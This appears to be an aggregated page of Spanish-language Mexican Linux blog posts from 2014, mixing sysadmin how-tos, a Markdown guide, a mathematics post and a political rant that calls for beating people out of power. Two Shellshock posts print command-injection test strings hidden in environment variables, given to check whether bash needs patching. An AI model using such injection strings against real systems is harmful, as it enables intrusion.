Todos quieren todo para todos y se manifiestan a veces muy enérgicos exigiendo como si te fueran a escuchar.

Es más escuchado el agresor anarquista que el pasivo con pancarta créanme... (Aunque no necesariamente más inteligente)

No se puede todo igual para todos... En serio no con ese idealismo y pseudohumanismo... Si quieres algo cercano a eso hay que comenzar a cambiar los modelos económicos... Madrear gente pa sacar del poder y comenzar a considerar los tabúes como ideas no tan estupidas... Tipo “privatización“... Después de los madrazos las cosas se tienen que reconsiderar... En europa todo está como en méxico se niegan.

Ley de telecomm en europa similar a mx lleva años... Y es para agarrar pedófilos y asesinos... Mientras no se tengan checados a todos no puedes tener sospechosos... Ahora si no quieres eso en tu ley... No te quejes del crimen organizado y acepta el hecho de que jamás resolverán tu caso.

El petróleo en europa está privatizado desde hace décadas y hay bastante en el norte... No tanto como méxico.

Pero vale madre porque las empresas privadas pagan muchos impuestos,hay competencia y mucho empleo.... Por lo tanto baja de precios y el país genera energía eólica y solar por todos lados... Tanta que le sobra y se la venden a países vecinos... Así que no hay que preocuparse sólo por un recurso energético... En méxico deberíamos manifestarnos mejor por poner plantas eólicas en todo el país y placas fotovoltaicas en cada techo por ley.

El no enfocarse sólo en petróleo los hace más ecologistas que todos los que se manifiestan porque no destruyan una playa en méxico,los hace generar más tecnología sin pensar en que es “verde“ porque en esencia cualquier consecuencia ya lo es.

Hay que reconsiderar las ideas que tal vez nuestros padres nos inculcaron para “defender“, los tiempos cambian... Y creo que la inocencia convierte los argumentos en falacias... Hay que saber qué defender.

Así que en resumen... Pateen,sáquenlos del trono los que puedan/podamos....

Respeto?

No... Nunca te respetaron... Te agredieron y mataron a tus abuelos... Padres... O tíos... No merecen ni que los menciones... Y cambia tus paradigmas... Ábrelos más al progresismo... La idea romántica pseudo anarquista que la “joven izquierda“ traemos... Es sólo un modelo en el cual tenemos que considerar como una utopía en el sentido estricto de la palabra. (no imposibilidad) sino el modelo que debemos intentar cada día como individuos y no como sociedad.

Vamos a darle,somos muchos y tenemos buenas ideas... Sólo hay que organizarlas.

Saludos

Sábado 11 de octubre de 2014

Xenode Systems: Linux: Un WINEPREFIX para cada aplicación Wine instalada

Viernes 10 de octubre de 2014

Luis Armando Medina

Luis Armando Medina
Como Instalar Linux

Que hacer después de instalar Ubuntu 14.04

Ubuntu 14.04 LTS  fue lanzado hace ya varios meses con muy buenas criticas en su haber y se ha mencionado en varias publicaciones que es la mejor versión de Ubuntu que se ha lanzado en los últimos años y comparto esta afirmación. Ubuntu 14.04 está instalado en mi laptop principal y si estás leyendo este […]
Luis Armando Medina

Luis Armando Medina
Como Instalar Linux

Netflix ahora funciona en Ubuntu y Linux Mint sin hacks

Netflix ahora esta gran aplicación o servicio está disponible para los usuarios de Ubuntu y Linux Mint (es lo que he probado que funciona) sin necesidad de hacer ninguna modificación.

Jueves 09 de octubre de 2014

Planeta Laguna: dnsmasq como servidor local de DNS

Miércoles 08 de octubre de 2014

Héctor Daniel Cortés

Héctor Daniel Cortés
'Aztec Eagle' Turbo

¿Dónde te agarró el temblor?

2014-10-08 02:40:54 (M6.2) GULF OF CALIFORNIA 23.8 -108.4 (82934)



Region: GULF OF CALIFORNIA
Geographic coordinates: 23.817N, 108.423W
Magnitude: 6.2
Depth: 10 km
Universal Time (UTC): 8 Oct 2014 02:40:54
Time near the Epicenter: 7 Oct 2014 19:40:54
Local standard time in your area: 7 Oct 2014 20:40:54

Location with respect to nearby cities:
121 km (75 mi) WSW of El Dorado, Mexico
128 km (79 mi) SW of Navolato, Mexico
128 km (79 mi) SW of Campo Gobierno, Mexico
135 km (83 mi) SW of Costa Rica, Mexico
1077 km (667 mi) WNW of Mexico City, Mexico


ADDITIONAL EARTHQUAKE PARAMETERS
________________________________
event ID : us b000sjt0

This is a computer-generated message and has not yet been reviewed by a
seismologist.
For subsequent updates, maps, and technical information, see:
http://earthquake.usgs.gov/earthquakes/eventpage/usb000sjt0
or
http://earthquake.usgs.gov/

National Earthquake Information Center
U.S. Geological Survey
http://earthquake.usgs.gov/regional/neic/


DISCLAIMER: https://sslearthquake.usgs.gov/ens/help.html?page=help#disclaimer

Martes 07 de octubre de 2014

Luis Armando Medina

Luis Armando Medina
Como Instalar Linux

Centos Install Apache

Un servidor centos siempre lo puedes usar como un web server para mostrar páginas web con el servidor apache ya sea para mostrar algún sitio de la empresa para la que trabajes o para mostrar un blog personal, centos es un linux server que te puede ayudar tener estos servicios operando en 15 minutos, pero no es tan simple como escribir centos install apache, la verdad, sería bueno que se hiciera así pero no te preocupes aquí te digo los pasos de cómo instalar apache en centos 7 o 6.x.
Planeta Laguna: Shell Shock Reverse Shell DHCP
Oswaldo Villa

Oswaldo Villa
Villatux Blog <--

Error en Postfix "Message size exceeds fixed limit"

Cuando ocurre este error no pueden salir correos por medio de el servidor, y esto es debido a que el correo es muy pesado o el adjunto está muy grande y pesado.

Para solucionarlo cambiamos los valores de /etc/postfix/main.cf a lo siguiente :

mailbox_size_limit = 0
message_size_limit = 0
virtual_mailbox_limit = 0



si no tienes estos parámetros, puedes incluirlos en el archivo de configuración



Domingo 05 de octubre de 2014

Xenode Systems: Remover sudo-user y habilitar Root en Ubuntu 14.04 y derivados

FSL se acerca

Jueves 02 de octubre de 2014

Renich Bon Ciric

HowTo: How to use your jack audio card with pulseaudio in Fedora 20

I, honestly, don’t know what happens here. I dunno if you’re delegating pulseaudio to jack or viseversa. Anyway, I use this method to enable my Focusrite Scarlett 18i20 in Fedora 20. I hope it helps out:

Procedure

#!/usr/bin/env bash

pulseaudio -k
pulseaudio -k
pulseaudio -k

pactl load-module module-jack-source;
pactl load-module module-jack-sink

After that (in GNOME 3), just go to Settings > Sound > Output and choose “Jack sink” as the default device. It should now work as your main audio output device.

Let me know, with your comments, of any success stories or feedback you might provide.

Miércoles 01 de octubre de 2014

Miguel de Icaza

Miguel de Icaza
Miguel de Icaza

Markdown Style Guide

Markdown is as a file format for easily producing text that can be pleasantly read both on the web and while using command line tools, or plain text editors.

Recently, a crop of tools have emerged that deliver some form of WYSIWYG or side-by-side authoring tools to assist writers to visualize the final output as they work.

Authors are turning to these tools to produce documentation that looks good when authoring the document, yet the tools are not true to the spirit and goals of markdown. And in some cases, authors are not familiar with the essence of what makes markdown great, nor the philosophy behind it:

Readability, however, is emphasized above all else. A Markdown-formatted document should be publishable as-is, as plain text, without looking like it’s been marked up with tags or formatting instructions.

Using these editors is the modern equivalent of using Microsoft Word to produce HTML documentation.

The generated markdown files very easy to produce, but are not suitable for human consumption. They likely violate a number of international treaties and probably will be banned by the EU.

This short post is a set of simple rules to improve your markdown.

They will help you deliver delight to all of your users, not just those using a web browser, but also those casually reading your documentation with a file manager, their console, and most importantly, potential contributors and copy editors that have to interact with your text.

Wrap Your Text

The ideal reading length for reading prose with a monospaced font is somewhere between 72 and 78 characters.

This is text snippet is from Mark Twain's Adventures of Tom Sawyer, with text wrapped around column 72, when reading in an 80x25 console:

It wont matter if you are using a larger console, the text will still be pleasant to read.

But if you use some of these markdown editors that do not bother wrapping your text, this is what the user would get:

And this is what is more likely to happen, with big consoles on big displays:

There is a reason why most web sites set a maximum width for the places where text will be displayed. It is just too obnoxious to read otherwise.

Many text editors have the ability of reformatting text your text when you make changes.

This is how you can fill your text in some common editors:

  • Emacs: Alt-Q will reformat your paragraph.
  • Vim: "V" (to start selection) then "gq" will reformat your selection.
  • TextMate: Control-Q.

Considering Using Two Spaces After a Period

When reading text on the console, using two spaces after a period makes it easier to see where phrases end and start.

While there is some debate as to the righteouness of one vs two spaces in the word of advanced typography these do not apply to markdown text. When markdown is rendered into HTML, the browser will ignore the two spaces and turn it into one, but you will give your users the extra visual cues that they need when reading text.

If you are interested in the topic, check these posts by Heraclitean River and DitchWalk.

Sample Code

For small code snippets, it is best if you just indent your code with spaces, as this will make your console experience more pleasant to use.

Recently many tools started delimiting code with the "```". While this has its place in large chunks of text, for small snippets, it is the visual equivalent of being punched in the face.

Try to punch your readers in the face only when absolutely necessary.

Headers

Unless you have plans to use multiple-nested level of headers, use the underline syntax for your headers, as this is visually very easy to scan when reading on a console.

That is, use:

Chapter Four: Which iPhone 6 is Right For You.
==============================================

In the previous chapter we established the requirement to buy iPhones
in packs of six.  Now you must choose just whether you are going to go
for an apologetically aluminum case, or an unapologetically plastic
iPhone.
	

Instead of the Atx-style headers:

# Chapter Four: Which iPhone 6 is Right For You.
	

The second style can easily drown in a body of text, and can not help as a visual aid to see where new sections start.

Blockquotes

While markdown allows you to only set the first character for a blockquote, like this:

> his is a blockquote with two paragraphs. Lorem ipsum dolor sit amet,
consectetuer adipiscing elit. Aliquam hendrerit mi posuere lectus.
Vestibulum enim wisi, viverra nec, fringilla in, laoreet vitae, risus.
	

Editors like Emacs, can reformat that text just fine, all you have to do is set the "Fill Prefix", by positioning your cursor after the "> " and use Control-x ., then you can use the regular fill command: Alt-Q, and this will produce:

> This is a blockquote with two paragraphs. Lorem ipsum dolor sit amet,
> consectetuer adipiscing elit. Aliquam hendrerit mi posuere
> lectus. Vestibulum enim wisi, viverra nec, fringilla in, laoreet
> vitae, risus.

Lists

Again, while Markdown will happily allow you to write things like:

*   Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
Aliquam hendrerit mi posuere lectus. Vestibulum enim wisi,
viverra nec, fringilla in, laoreet vitae, risus.
*   Donec sit amet nisl. Aliquam semper ipsum sit amet velit.
Suspendisse id sem consectetuer libero luctus adipiscing.

You should love your reader, and once again, if you are using something like Emacs, use the fill prefix to render the list like this instead:

*   Lorem ipsum dolor sit amet, consectetuer adipiscing elit.
    Aliquam hendrerit mi posuere lectus. Vestibulum enim wisi,
    viverra nec, fringilla in, laoreet vitae, risus.
*   Donec sit amet nisl. Aliquam semper ipsum sit amet velit.
    Suspendisse id sem consectetuer libero luctus adipiscing.	

Martes 30 de septiembre de 2014

Oswaldo Villa

Oswaldo Villa
Villatux Blog <--

Vulnerabilidad en BASH CVE-2014-6271 "Shellshock"

Les dejo este howto para que actualicen el paquete "bash" ya que tiene la vulnerabilidad  BASH CVE-2014-6271 "Shellshock"   y con ella tu servidor puede ser comprometido y con el toda la información contenida.

Verifica si eres vulnerable
En una terminal ejecuta el siguiente comando:

env x='() { :;}; echo vulnerable' bash -c "esto es una prueba"

Si eres vulnerable te saldrá un mensaje:


vulnerable
esto es una prueba

Si no eres vulnerable te saldrá unicamente:


esto es una prueba

Para actualizar bash primero debes actualizar la lista de paquetes 

apt-get update

y luego actualizar bash

apt-get install --only-upgrade bash

Si no se actualizó bash, es que no tienes correctamente tus repositorios de paquetes.

edita el /etc/apt/sources.list  y agrega el siguiente repo:

deb http://ftp.debian.org/debian sid main contrib non-free

despues e esto vuelve a actualizar bash

Lunes 29 de septiembre de 2014

Alcance Libre: Red Hat amplía su colaboración con CISCO y Nokia Networks
Planeta Laguna: Limpiar y restaurar una máquina de afeitar

Domingo 28 de septiembre de 2014

Alex Callejas

Bash critical security vulnerability: shellshock

watchmen-rorschach

Por cierto, necesitas una cerradura más resistente, la nueva se ha roto de un sólo empujónRorschach [Watchmen]

El pasado miércoles se descubrió una vulnerabilidad en el intérprete de comandos más utilizado en la mayoría de los sistemas Linux, bash, la vulnerabilidad surge del hecho de que se pueden crear variables de entorno con valores especialmente diseñados antes de llamar a la shell bash. Estas variables pueden contener código que es ejecutado tan pronto como se invoca el shell. El nombre de estas variables no importa, sólo sus contenidos.

Al día de hoy, varios sitios han publicado guías y análisis de esta vulnerabilidad:

IMG_7408

La forma más simple de saber si alguno de nuestros equipos es vulnerable, es ejecutando:

[root@hobbiton ~]# env x='() { :;}; echo OOPS' bash -c /bin/true

Si el comando nos devuelve la cadena OOPS, significa que nuestro equipo es vulnerable y tenemos que actualizar.

Diferentes sitios de varias distribuciones han publicado la actualización correspondiente a esta vulnerabilidad:

Incluso los sistemas OS X también son vulnerables, aquí la guía para aplicar el patch. Update: Aquí las ligas de descarga del patch, según su OS X:

Es muy importante actualizar el paquete porque ya han utilizado la vulnerabilidad para realizar ataques:

Espero les sirva…

Sábado 27 de septiembre de 2014

WordPress xmlrpc DDOS mitigation

Well not long ago DH contacted me with this dreaded message:

Hello,

I’m writing you about your domain:

foo.bar

Specifically the file:

xmlrpc.php

This file is used for modifying your wordpress install from 3rd party programs, like mobile site designers, desktop client programs, and pretty much anything besides the wordpress control panel under wp-admin.  Bots and hackers have been increasingly attacking these files listed above to try to either brute force into the wordpress installs, or cause other downtime and server issues.  Our security team is working on blocks and protections to prevent these, but in the meantime this is causing server issues and downtime for your site, so our oncall admin has had to disable the file by changing permissions to 200 so it isn’t accessible.  If you don’t use external programs to modify this blog, you likely won’t even notice any chance in behavior and it can remain.  If you do make use of this file, when you next need to use it it can be re-enabled by chmod. If you have further questions please let us know.

This was on august 3… I suppose we where part of a severe DDOS that were targeting third party sites…

Two weeks ago we got report for another site I run, this time on a bigger VPS, that we where participating on an ongoing DDOS [1] that we also caught as our machine resources were drawn terribly.

Yesterday we got visits again, of course we were aware of the problem and originally chmoded 000 the file, dropped via iptables 3 subnets that where hammering it and all was good, but as you can read on several places disabling this file breaks severe functions of WP [2].

So as we use nginx as front end, begin to investigate if like on apache or lighty could exist something like mod_evasive and indeed exists [2] it’s called  mod_http_limit_req_module so after reading it, I searched for examples and find a very good one that inspired this setup [3] so we ended with the next changes on nginx.conf:

# Prevent DDOS
limit_req_zone $binary_remote_addr zone=one:10m rate=1r/m;

So we are limiting request to 1 request for minute, but as you could imagine we don’t want this for all the site, so next on the site conf we added

location = /xmlrpc.php
{
limit_req zone=one burst=5;
}

So we had 1 connection for minute on this file and a burst of five, but as this guys where hammering at more than one connection per second, well I suspect going to get a lot of 503 messages, I only expect that normal sites and ourselves not need this file more than one time for minute… on the bright side CPU, IO, and other resources are normal now, BTW some better advice if you don’t manage a server but had only access to .htaccess can be found here [5]

[1] http://blog.sucuri.net/2014/03/more-than-162000-wordpress-sites-used-for-distributed-denial-of-service-attack.html
[2] https://wordpress.org/support/topic/xmlrpcphp-attack-on-wordpress-38
[3] http://nginx.org/en/docs/http/ngx_http_limit_req_module.html
[4] https://cowthink.org/flood-dos-protection-with-limit-req-in-nginx/
[
5] https://wordpress.org/support/topic/resolving-xmlrpcphp-ddos-attack-with-htaccess-redirect

Planeta Laguna: CVE-2014-6271 cgi-bin reverse shell

Jueves 25 de septiembre de 2014

Promoviendo Software Libre: Actualizar Bash Fedora 20

CentOS: more space needed on the /boot filesystem.

Mientras estaba actualizando unas dependencias de CentOS me salio el siguiente error:

Install       1 Package(s)

Total download size: 28 M
Installed size: 121 M
Is this ok [y/N]: y
Downloading Packages:
kernel-2.6.32-431.29.2.el6.x86_64.rpm                                    |  28 MB     00:05
Running rpm_check_debug
Running Transaction Test


Transaction Check Error:
  installing package kernel-2.6.32-431.29.2.el6.x86_64 needs 12MB on the /boot filesystem

Error Summary
-------------
Disk Requirements:
  At least 12MB more space needed on the /boot filesystem.

Y efectivamente ya no me quedaba espacio.

root@chiapas$ df -H /boot
Filesystem      Size  Used Avail Use% Mounted on
/dev/md0        102M   79M   18M  82% /boot

Para solucionar esto y poder instalar el nuevo kernel (o las dependencias de este) es necesario borrar los antiguos núcleos:

root@chiapas$ rpm -qa | grep kernel
...
kernel-devel-2.6.32-431.20.3.el6.x86_64
dracut-kernel-004-336.el6_5.2.noarch
..
kernel-devel-2.6.32-431.17.1.el6.x86_64
kernel-2.6.32-431.23.3.el6.x86_64
kernel-2.6.32-431.11.2.el6.x86_64

#Suprimimos los nucleos viejos
root@chiapas$ rpm -e kernel-2.6.32-431.11.2.el6.x86_64
root@chiapas$ rpm -e kernel-2.6.32-431.23.3.el6.x86_64

De esta forma liberamos el espacio y procedemos con la instalación.

Xenode Systems: Nuevo Heartbleed: vulnerabilidad en Bash detectada (CVE-2014-6271, #Shellshock)

Martes 23 de septiembre de 2014

unattended-upgrades

Dpkg::Pre-Invoke {"mount -o remount,exec /tmp";};
DPkg::Post-Invoke {"mount -o remount,noexec /tmp";};

Quick hack as I use a noexec (nosuid, or whichever) /tmp on /etc/apt/apt.conf.d/50unattended-upgrades we need to tell to dpkg to change /tmp or some packages that need pre configuring will fail.

Eduardo Ruiz Duarte

Eduardo Ruiz Duarte
beck's site

Cohomología de grupos

Queremos estudiar el la jacobiana $latex \mathbb{J}_{\mathbb{F}_q}(\mathcal{C})$ de una curva $latex \mathcal{C}$ hiperelíptica de género 2 con puntos $latex [f(t),g(t)] \in \mathcal{C}(\mathbb{F}_{q}(t))$, es decir en el campo de funciones racionales en una variable con coeficientes en $latex \mathbb{F}_q$, esto es para darle más estructura a la curva ya que en cierta extensión de $latex \mathbb{F}_q$ tendremos que será isomorfa a $latex \mathcal{C}(\mathbb{F}_q)$ porque ambas tendrán el mismo $latex j-$invariante, a esta nueva curva en la extensión del campo se le llama el twist de $latex \mathcal{C}$, más adelante veremos como usar el $latex \j-$invariante para clasificar curvas, pero primero necesitamos las herramientas necesarias, todo esto con el fin de poder demostrar el teorema de Hasse-Weil de una forma distinta el cual tiene aplicaciones importantes en criptografía con curvas algebraicas.


Sea $latex G$ un grupo finito y sea $latex M$ un grupo abeliano en el cual $latex G$ actúa, denotamos a la acción de $latex \sigma \in G$ en $latex m\in M$ por $latex m \rightarrow m^\sigma$.

Sean $latex m,n\in M$, entonces decimos que $latex M$ es un $latex G-$módulo derecho si la acción de $latex G$ en $latex M$ satisface:


$latex m^e = m$              $latex (m+n)^\sigma = m^\sigma + n^\sigma$            $latex (m^\sigma)^\tau = m^{\sigma\tau}$


Si $latex M,G$ son $latex G-$módulos, un $latex G-$homomorfismo es un homomorfismo de grupos abelianos $latex \phi:M\rightarrow N$ que conmuta con la acción de $latex G$, en símbolos:

$latex \phi(m^\sigma)=\phi(m)^\sigma$    $latex \forall m\in M$ y $latex \sigma \in G$


Definimos el 0-ésimo grupo de cohomología del $latex G-$módulo $latex M$ 

$latex H^0(G,M)=\lbrace m\in M : m^\sigma = m$    $latex \forall \sigma \in G \rbrace$


Es decir, es el submódulo de $latex M$ que tiene todos los elementos que son invariantes bajo los elementos de $latex G$, recuerden que este $latex G$ puede ser un grupo de automorfismos por ejemplo.

Recordemos que un complejo de co-cadenas es una sucesión de grupos abelianos o de módulos $latex (M_\bullet,d_\bullet)$ que están conectados por homomorfismos $latex d_{i}:M^i \rightarrow M^{i+1}$ llamados operadores de cofrontera, ya que pedimos que $latex d^{n+1}\circ d^n = 0$   $latex \forall n$ , esto es dual con los complejos de cadena, solo que en homología los operadores de frontera decrementan la dimensión mientras que en co cadenas la aumentan. 

$latex ... \rightarrow M^{-2} \xrightarrow{d_{-2}} M^{-1} \xrightarrow{d_{-1}} M^0 \xrightarrow{d_0} M^1 \xrightarrow{d_1}  ... \rightarrow M^{n-1} \xrightarrow{d_{n-1}}M^n\rightarrow ...$

Una propiedad básica de esto es que si tenemos una sucesión exacta de $latex G-$módulos, otra sucesión exacta.

Es decir

$latex 0\rightarrow P \xrightarrow{\phi} M \xrightarrow{\psi} N \rightarrow 0$

Tenemos que también es exacta


$latex 0\rightarrow H^0(G,P)\rightarrow H^0(G,M)\rightarrow H^0(G,N)$

Pero el mapeo último no será suprayectivo, para medir que "tan no suprayectivo" es, vamos a definir la parte de cohomología de grupos.


Definición: Sea $latex M$ un $latex G-$módulo, el grupo de n-cocadenas de $latex G$ a $latex M$ es:

$latex C^n(G,M)=\lbrace \omega:G^n\rightarrow M \rbrace$

Es decir, son todos los mapeos de $latex G^n$ a $latex M$


Definición: Decimos que el i-ésimo diferencial 

$latex d^{i}_{M}:C^i(G,M)\rightarrow C^{i+1}(G,M)$

Es el mapeo.

$latex d^i(f)(g_0,g_1,...,g_i)=$
$latex g_0 f(g_1,...,g_i)+\displaystyle \sum_{j=1}^i {(-1)^j f(g_0,...,g_{j-1}g_j,g_{j+1},...,g_i) } + (-1)^{i+1}f(g_0,...,g_{i-1})$

Esta función está pensada para que funcione como un operador de co-frontera, y que anule su diferencial en una dimensión más baja, asó como en homología, y podamos construir sucesiones exactas, es decir.

$latex d^{i+1} \circ d^i = 0$


Definición: El grupo n-cociclos de $latex G$ a $latex M$ (con coeficientes en $latex M$) es:

$latex Z^n(G,M)=ker(d^n)$

Definición: El grupo de n-cofronteras

$latex B^n(G,M)=im(d^{n-1})$ para $latex n\geq 1$

y para $latex n=0$ 

$latex B^0(G,M)=0$

Bueno... hasta ahora qué tanto tenemos?

Recordemos que   $latex d^{i+1} \circ d^i = 0$  por lo que es fácil notar que $latex C^{\bullet}(G,M)=(C^i(G,M),d^i)$ es un complejo de co-cadenas y entonces como $latex B^i(G,M)\leq Z^i(G,M)$ podemos definir el n-ésimo grupo de cohomología

$latex H^n(G,M)=Z^n(G,M)/B^n(G,M)$

Este grupo medirá qué tan alejado está un complejo de cadenas de ser exacto.

Una cosa importante en cohomología es que convierte una sucesión exacta corta de $latex G-$módulos en una sucesión exacta larga de grupos abelianos.

A nosotros nos interesa mucho $latex H^0(G,M)$ el cuál ya definimos y $latex H^1(G,M)$

Por lo que podemos ver que:

$latex H^0(G,M)=M^G$ es decir son los $latex G-$invariantes

ya que: 

Si $latex m\in M$ entonces $latex d^0(m)(g)=gm-m$ por lo que $latex ker(d_0)=M^G$

También tenemos que

$latex Z^1(G,M)=\lbrace f:G\rightarrow M \mid f(gh)=gf(h)+f(g) \rbrace$

Esto es fácil de ver también directamente de la definición... otra cosa que hay que observar es que si la acción de $latex G$ es trivial entonces

$latex H^0(G,M)=M$ y $latex H^1(G,M)=Mor(G,M)$ 

lo cual también es evidente.


Espero les haya servido.



Eduardo Ruiz Duarte (beck)
twitter: @toorandom


Lunes 22 de septiembre de 2014

Alcance Libre: Red Hat adquiere FeedHenry y añade una plataforma de aplicaciones móviles para la empresa.

Viernes 19 de septiembre de 2014

José Oviedo

José Oviedo
oviedo.mx

rkhunter: Warnings y más warnings

Estoy escaneando en busca de troyanos y rootkit mi servidor Debian con la aplicación rkhunter, y en el log veo que tengo diferentes warnings en archivos del sistema como por ejemplo:

/usr/sbin/adduser [ Warning ]
/usr/bin/lwp-request [ Warning ]
/bin/which [ Warning ]

Y por ejemplo el adduser el warning indicaba que apuntaba a un archivo de perl , entonces para no ponerme paranoico investigue sobre lo sucedido y veo que falta agregar un parametro en el archivo de configuración de rkhunter: /etc/rkhunter.conf, como estoy utilizando debian (ubuntu) falta agregar esta línea:

PKGMGR=DPKG

Eso indica que las validaciones se harán con dpkg y entonces vualaa! ya no más warnings en estos archivos.

Alex Callejas

Software Freedom Day – CDMX 2014

SDF-Asistire

Los buenos amigos de G3ekArmy  invitan a asistir al Software Freedom Day (Día Mundial del Software Libre), que se celebrará en el TelmexHub, en el centro de la Ciudad. Habrá diferentes actividades educativas sobre los beneficios del uso del Software Libre, así como diferentes talleres para aprender a usar diferentes herramientas y mejorar la experiencia en el uso de otras más.

Pueden dar clic en el cartel para checar todas las actividades que se realizarán:

SFD-G3ekArmy

El único requisito es registrarse, para agilizar el acceso al Hub.

Espero que puedan ser parte de esta celebración, Allá nos vemos! :)

Jueves 18 de septiembre de 2014

Conociendo hdiutil

El programa hdiutil es una utilidad de línea de comandos de Apple para trabajar con imágenes de disco. Las imágenes de disco (por lo general con un .dmg, .img o .iso extensión de archivo) se utilizan a menudo para la distribución de programas y para la grabación de CDs / DVDs.

Convertir de .ISO a .dmg

> [ rafael ] ~/Documents/Isos SO/ovm $ ls -lt
total 508344
-rwxrwxrwx  1 rafael  staff  260270080 Jun 14 15:07 OVM_Server.iso
> [ rafael ] ~/Documents/Isos SO/ovm $ hdiutil convert OVM_Server.iso -format UDRW -o OVM_server.dmg
Leyendo Oracle VM Server cd 1 20140416   (Apple_ISO: 0)…
.........................................................................................
Tiempo transcurrido: 975.031ms
Velocidad: 254.6Mbytes/s
Ahorro: 0.0%
created: /Users/rafael/Documents/Isos SO/ovm/OVM_server.dmg

Convertir de .dmg a .ISO

> [ rafael ] ~/Documents/Isos SO/ovm $ ls
OVM_Server.iso	OVM_server.dmg
> [ rafael ] ~/Documents/Isos SO/ovm $ hdiutil convert OVM_Server.iso -format UDRW -o imagen_ovm_en.dmg
Leyendo Oracle VM Server cd 1 20140416   (Apple_ISO: 0)…
.........................................................................................
Tiempo transcurrido:  1.160s
Velocidad: 213.8Mbytes/s
Ahorro: 0.0%
created: /Users/rafael/Documents/Isos SO/ovm/imagen_ovm_en.dmg
> [ rafael ] ~/Documents/Isos SO/ovm $

Crear un dmg de un folder.

> [ rafael ] ~/Documents/Isos SO $ pwd
/Users/rafael/Documents/Isos SO
> [ rafael ] ~/Documents/Isos SO $ hdiutil create ovm_folders.dmg -srcfolder ovm/
..................................................................................
created: /Users/rafael/Documents/Isos SO/ovm_folders.dmg
> [ rafael ] ~/Documents/Isos SO $ ls -l ovm_folders.dmg
-rw-r--r--@ 1 rafael  staff  718207852 Sep 18 15:14 ovm_folders.dmg
> [ rafael ] ~/Documents/Isos SO $

Montar y desmontar una imagen.

> [ rafael ] ~/Documents/Isos SO $ hdiutil mount test.dmg

> [ rafael ] ~/Documents/Isos SO $ hdiutil unmount /dev/device-name

Crear una imagen encriptada:

> [ rafael ] ~/Documents/Isos SO $ hdiutil create -encryption -size 10m -volname encdata test.dmg -fs HFS+J

Durante la creación de la imagen del disco, te pedirá una contraseña que le permitirá el acceso a los contenidos de la imagen.

Planeta Laguna: Reencarnarán siempre en un recuerdo
Planeta Laguna: La persistencia
Planeta Laguna: Rogar y gemir

Miércoles 17 de septiembre de 2014

Hazzim Anaya

Hazzim Anaya
Unix User...

Vagrant

vagrant up

Martes 16 de septiembre de 2014

LogicalBricks Solutions: Configuración de Vim por proyecto

Jueves 11 de septiembre de 2014

Gerónimo Orozco

Gerónimo Orozco
Patux's booring news

FSL 2014 : El poder detras del sistema - Recepcion de propuestas abierta

El FSL 2014, "El poder detras del sistema" esta a la vuelta de la esquina 30 y 31 de Oct / 1 y 2 de Nov 2014, Puerto Vallarta, Jal.

Este FSL se enfocara a temas de administracion de sistemas, automatizacion y DevOps.

El registro para asistentes y la recepcion de propuestas de ponencias ya estan abiertos.



...nos vemos en Vallarta.
Renich Bon Ciric

HowTo: Change your css according to client’s time

I am no fan of javascript. In fact, I despise it. But, recently, it occured to me that it would be cool to change the CSS theme according to the client’s time.

Here’s how:

function change_css_according_to_time() {
    var d = new Date();
    var h = d.getHours();

    if ( h >= 7 && h <= 19 ) {
        console.log( 'Good day!' );
        document.getElementById("mainStyle").href = '/css/default-day.css';
    } else {
        console.log( 'Good evening!' );
    }
}

change_css_according_to_time()

Demo: http://web2.woralelandia.com/

Check out the default.js. It’s as simple as that.

Also, you just need the VanillaJS framework: http://vanilla-js.com/.

Have fun!

Miércoles 10 de septiembre de 2014

Congreso de Seguridad y Desarrollo Hack-Urbano 2014.

El equipo de Hack-Urbano me ha invitado a este ciclo de conferencias sobre desarrollo y seguridad informática en Boca del Rio Veracruz los días 10, 11 y 12 de Octubre del 2014.

Para los fanáticos de los video juegos, hack-urbano regalará un XBOX-ONE y la empresa TPX.MX regalará un dominio .MX con su respectivo Hosting por un año:



Nos vemos en Boca del Rio.

Martes 09 de septiembre de 2014

Gerónimo Orozco

Gerónimo Orozco
Patux's booring news

OpenStack GDL September 2014

Registrate


Lunes 08 de septiembre de 2014

Planeta Laguna: Comprando en línea para solucionar problemas.
Gustavo Rubio

Gustavo Rubio
Ahí vamos

Del software lock-in al service-lock-in

phone_callY no hablo de libertad de expresión, que es harina de otro costal, hago referencia a una cuestión más técnica, y estoy hablando de la posibilidad de poder utilizar herramientas que sean útiles sin obstáculos por parte de terceros. Después de leer la noticia del aparente cierre de twitpic se me vino a la mente algo que tengo tiempo pensando y es el hecho de depender tanto en plataformas de terceros para poder realizar cualquier actividad tecnológica, sobre todo en Internet. Aun cuando el ecosistema de muchas de estas tecnologías como Twitter es aparentemente “abierta” la infraestructura y la comunidad que hacen que sea útil no lo son. Capitalismo puro, y entendible, ya que la empresa tratará de proteger sus intereses pero ¿Cómo nos afecta esto como usuarios y desarrolladores?

No es la primera vez que twitter bloquea cierta funcionalidad de su plataforma, o que sucede al revés. Instagram comenzó por bloquear los previews de las fotografías subidas por los usuarios a su red en twitter, es decir, para poder ver la foto uno debe ir al sitio de instagram y ya no es posible hacerlo desde nuestro cliente de twitter favorito. Si bien ninguna de estas limitantes es de vida o muerte (o usar twitter, o cualquier otra red social para el caso) si marca una tendencia de las compañías que controlan la tecnología en Internet, una doble moral: libertad donde conviene.

He visto como colegas y gente del medio del desarrollo de software se regodean y emocionan cada vez que hay un nuevo repositorio con código OpenSource liberado por alguna de estas empresas. Si bien es cierto que muchas de estas empresas han contribuído con piezas importantes de software (como Twitter con Bootstrap, por dar un ejemplo) también es cierto que la mayoría de las veces estas acciones obedecen más a cuestiones de marketing y publicidad que otra cosa. Al final del día son empresas que buscan lucrar, pero sobre todo, lucrar de una mera que siga el motto ese inventado por Google, el “Don’t be evil” donde se nos provee de una vasta gama de herramientas sobre todo a desarrolladores que deseamos integrarnos a su servicio, de manera que se piense que estas empresas de Internet son totalmente diferentes al monstruo corporativo de hace décadas, ese monolítico, dictador, gris y representado por empresas llenas de Godínez. Estas nuevas empresas, verdes, sin gluten, orgánicas, veganas, chic, cool, en bici y del Bay Area son diferentes, son complacientes, son compartidas y buscan el bien común. ¿Cierto?

No.

